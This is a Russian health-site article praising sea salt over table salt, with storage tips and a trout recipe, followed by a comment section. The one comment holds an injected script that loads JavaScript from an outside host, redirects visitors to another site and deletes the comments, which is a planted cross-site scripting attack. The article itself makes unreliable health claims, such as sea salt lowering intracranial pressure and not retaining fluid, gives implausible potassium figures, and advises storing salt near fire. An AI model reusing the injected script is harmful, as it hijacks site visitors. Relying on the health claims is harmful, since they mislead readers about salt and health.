Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  В чем соль? Почему морска...  >>  В чем соль? Почему морская соль полезнее
 
Обратная связь
 

В чем соль? Почему морская соль полезнее

Размер шрифта
15 декабря 2011 08:00
  • google_analytics: false
  • Нравится

Почему все больше людей переходят на соль морскую? Чем она отличается от обычной поваренной? Готовим форель с морской солью.

Морская соль добывается естественным путем. Морская вода на солнце испаряется, и образуются кристаллы соли. Лучшую морскую соль добывают во Франции, Англии, Израиле и на Гавайях.

Чем полезна морская соль?

  1. Морская соль, в отличие от обычной столовой, не состоит исключительно из хлорида натрия, а содержит в себе и другие микроэлементы: калий, натрий, кальций, магний, железо, бром, хлор, марганец, цинк, селен, медь, кремний и йод.

  2. Морская соль не задерживает жидкость в организме. Благодаря брому и магнию морская соль выводит лишнюю жидкость из организма, а также снижает внутричерепное давление, а значит, избавляет нас от головной боли.

  3. Калий поддерживает нормальное давление крови, предупреждая развитие гипертонии. Калий вытесняет натрий, который удерживает воду в организме. Тем самым калий избавляет нас от отеков.

  4. В 5 граммах морской соли содержится суточная потребность организма в йоде. Это необходимый элемент для нормальной работы щитовидной железы, которая отвечает за обмен веществ, регулирует функции сердечно-сосудистой и нервной системы.

  5. Селен – микроэлемент, который защищает наши клетки от свободных радикалов, которые вызывают рак и сокращают продолжительности нашей жизни.

Пьедестал почета по количеству калия:

1. Морская соль – 4,21 мг на 100 г.

2. Йодированная – 3,27 мг на 100 г.

3. Поваренная – 2,21 мг на 100 г.

Суточная доза соли

В сутки можно употреблять от 0,5 до 5 г морской соли. Не забывайте о продуктах со «скрытой» солью – хлеб, сыр, квашеная капуста, колбаса, соленая рыба.

Как выбрать

- Для первых блюд, засолки и консервирования лучше выбирать морскую соль крупного помола. Мелка больше подойдет для готовых блюд.

- Самой ценной считается серая морская соль. Такой цвет она имеет потому, что в ней есть включения океанической глины и частичек микроскопической водоросли дюналиеллы – растения, обладающего антиоксидантными свойствами.

- Соль должна быть сухой, свободно пересыпаться в упаковке. Если соль влажная, значит, она плохо хранилась и отсырела.

- Вместо соли можно купить смесь морской соли с травами. Как правило, в соль добавляют лук, базилик петрушку, а также морские водоросли и пряности. Такую смесь рекомендуется использовать в качестве приправы к любому блюду. Пряная соль способствует выведению из организма излишней жидкости и расщеплению жиров.

Как хранить

- Пищевая соль должна храниться в сухом месте, в закрытой таре, поскольку впитывает влагу. Если не закрывать соль – она образует комья.

- Йодированная соль требует особых условий хранения – темное прохладное место, чтобы йодистый калий не разлагался. Банку с йодированной солью можно хранить на нижней полке холодильника.

- Чтобы соль не отсыревала, на дно банки можно положить кусочек промокательной бумаги или пару столовых ложек риса, которые впитают лишнюю влагу.

- Держите емкость для хранения соли рядом с огнем, чтобы снизить до минимума возможность проникновения влажного воздуха внутрь банки.

Как готовить

- Постарайтесь заменить обычную поваренную соль морской.

- Морскую соль лучше добавлять в готовые блюда: ее полезные свойства теряются при термообработке.

Рецепт «Форель с морской солью»

1. Форель почистить, вымыть, удалить жабры и все внутренности.

2. Морскую соль и перец горошком потолочь в ступке. Рыбу посолить и завернуть в фольгу.

3. Запекать в духовке 40 минут при температуре 200-220 градусов. Готовое блюдо можно украсить листьями петрушки.

Видеосюжеты по теме:

Морская соль. Чем она лучше обычной

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.